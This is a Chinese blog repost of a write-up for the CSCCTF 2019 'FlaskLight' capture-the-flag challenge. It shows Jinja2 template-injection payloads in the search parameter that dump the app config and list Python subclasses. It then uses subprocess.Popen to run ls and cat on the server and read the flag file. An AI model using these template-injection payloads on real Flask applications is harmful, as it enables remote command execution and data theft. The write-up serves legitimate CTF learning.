[CSCCTF 2019 Qual] FlaskLight
生活随笔
收集整理的這篇文章主要介紹了
[CSCCTF 2019 Qual] FlaskLight
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
信息收集
index大致就這樣,沒什么信息
F12看下,發(fā)現(xiàn)了線索:search參數(shù)
試下ssti
基本就是ssti了
漏洞利用
config 也是 Flask模版中的一個全局對象,它包含了所有應(yīng)用程序的配置值。 {{ config.items() }} // 查看配置項(xiàng)目的信息 輸入:http://xxxxx//?search={{%20config.items()%20}}爆出一堆信息,這里獲得第二個線索,flag在這個目錄
You searched for: [('JSON_AS_ASCII', True), ('USE_X_SENDFILE', False), ('SESSION_COOKIE_SECURE', False), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_DOMAIN', False), ('SESSION_COOKIE_NAME', 'session'), ('MAX_COOKIE_SIZE', 4093), ('SESSION_COOKIE_SAMESITE', None), ('PROPAGATE_EXCEPTIONS', None), ('ENV', 'production'), ('DEBUG', False), ('SECRET_KEY', 'CCC{f4k3_Fl49_:v} CCC{the_flag_is_this_dir}'), ('EXPLAIN_TEMPLATE_LOADING', False), ('MAX_CONTENT_LENGTH', None), ('APPLICATION_ROOT', '/'), ('SERVER_NAME', None), ('PREFERRED_URL_SCHEME', 'http'), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('TESTING', False), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(31)), ('TEMPLATES_AUTO_RELOAD', None), ('TRAP_BAD_REQUEST_ERRORS', None), ('JSON_SORT_KEYS', True), ('JSONIFY_MIMETYPE', 'application/json'), ('SESSION_COOKIE_HTTPONLY', True), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(0, 43200)), ('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SESSION_REFRESH_EACH_REQUEST', True), ('TRAP_HTTP_EXCEPTIONS', False)]Here is your result []
看了大佬的wp,得知{{''.__class__.__mro__[2].__subclasses__()}}可以爆出所有類,暫且不知原理
同樣copy自大佬的exp
輸出結(jié)果
170 | <class 'jinja2.environment.Environment'> 171 | <class 'jinja2.environment.Template'> 173 | <class 'jinja2.environment.TemplateExpression'> 174 | <class 'jinja2.environment.TemplateStream'> 175 | <class 'jinja2.loaders.BaseLoader'> 176 | <type 'datetime.date'> 177 | <type 'datetime.timedelta'> 178 | <type 'datetime.time'> 179 | <type 'datetime.tzinfo'> 180 | <class 'logging.LogRecord'> 181 | <class 'logging.Formatter'> 182 | <class 'logging.BufferingFormatter'> 183 | <class 'logging.Filter'> 184 | <class 'logging.Filterer'> 185 | <class 'logging.PlaceHolder'> 186 | <class 'logging.Manager'> 187 | <class 'logging.LoggerAdapter'> 188 | <class 'werkzeug._internal._Missing'> 189 | <class 'werkzeug._internal._DictAccessorProperty'> 190 | <class 'werkzeug.utils.HTMLBuilder'> 191 | <class 'werkzeug.exceptions.Aborter'> 192 | <class 'werkzeug.urls.Href'> 193 | <type 'select.epoll'> 194 | <class 'click._compat._FixupStream'> 195 | <class 'click._compat._AtomicFile'> 196 | <class 'click.utils.LazyFile'> 197 | <class 'click.utils.KeepOpenFile'> 198 | <class 'click.utils.PacifyFlushWrapper'> 199 | <class 'click.parser.Option'> 200 | <class 'click.parser.Argument'> 201 | <class 'click.parser.ParsingState'> 202 | <class 'click.parser.OptionParser'> 203 | <class 'click.types.ParamType'> 204 | <class 'click.formatting.HelpFormatter'> 205 | <class 'click.core.Context'> 206 | <class 'click.core.BaseCommand'> 207 | <class 'click.core.Parameter'> 208 | <class 'werkzeug.serving.WSGIRequestHandler'> 209 | <class 'werkzeug.serving._SSLContext'> 210 | <class 'werkzeug.serving.BaseWSGIServer'> 211 | <class 'werkzeug.datastructures.ImmutableListMixin'> 212 | <class 'werkzeug.datastructures.ImmutableDictMixin'> 213 | <class 'werkzeug.datastructures.UpdateDictMixin'> 214 | <class 'werkzeug.datastructures.ViewItems'> 215 | <class 'werkzeug.datastructures._omd_bucket'> 216 | <class 'werkzeug.datastructures.Headers'> 217 | <class 'werkzeug.datastructures.ImmutableHeadersMixin'> 218 | <class 'werkzeug.datastructures.IfRange'> 219 | <class 'werkzeug.datastructures.Range'> 220 | <class 'werkzeug.datastructures.ContentRange'> 221 | <class 'werkzeug.datastructures.FileStorage'> 222 | <class 'email.LazyImporter'> 223 | <class 'calendar.Calendar'> 224 | <class 'werkzeug.wrappers.accept.AcceptMixin'> 225 | <class 'werkzeug.wrappers.auth.AuthorizationMixin'> 226 | <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'> 227 | <class 'werkzeug.wsgi.ClosingIterator'> 228 | <class 'werkzeug.wsgi.FileWrapper'> 229 | <class 'werkzeug.wsgi._RangeWrapper'> 230 | <class 'werkzeug.formparser.FormDataParser'> 231 | <class 'werkzeug.formparser.MultiPartParser'> 232 | <class 'werkzeug.wrappers.base_request.BaseRequest'> 233 | <class 'werkzeug.wrappers.base_response.BaseResponse'> 234 | <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'> 235 | <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'> 236 | <class 'werkzeug.wrappers.etag.ETagRequestMixin'> 237 | <class 'werkzeug.wrappers.etag.ETagResponseMixin'> 238 | <class 'werkzeug.wrappers.cors.CORSRequestMixin'> 239 | <class 'werkzeug.wrappers.cors.CORSResponseMixin'> 240 | <class 'werkzeug.useragents.UserAgentParser'> 241 | <class 'werkzeug.useragents.UserAgent'> 242 | <class 'werkzeug.wrappers.user_agent.UserAgentMixin'> 243 | <class 'werkzeug.wrappers.request.StreamOnlyMixin'> 244 | <class 'werkzeug.wrappers.response.ResponseStream'> 245 | <class 'werkzeug.wrappers.response.ResponseStreamMixin'> 246 | <class 'werkzeug.test._TestCookieHeaders'> 247 | <class 'werkzeug.test._TestCookieResponse'> 248 | <class 'werkzeug.test.EnvironBuilder'> 249 | <class 'werkzeug.test.Client'> 250 | <class 'uuid.UUID'> 251 | <type 'CArgObject'> 252 | <type '_ctypes.CThunkObject'> 253 | <type '_ctypes._CData'> 254 | <type '_ctypes.CField'> 255 | <type '_ctypes.DictRemover'> 256 | <class 'ctypes.CDLL'> 257 | <class 'ctypes.LibraryLoader'> 258 | <class 'subprocess.Popen'> indexo of subprocess.Popen:258得到了subprocess.Popen:258
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}} ?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}} ?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}Reference
Templates Injections
刷題[CSCCTF 2019 Qual]FlaskLight
官方wp
總結(jié)
以上是生活随笔為你收集整理的[CSCCTF 2019 Qual] FlaskLight的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 云服务器1M带宽够用吗?(并发数计算方法
- 下一篇: 【高质量图片批量压缩工具】Squash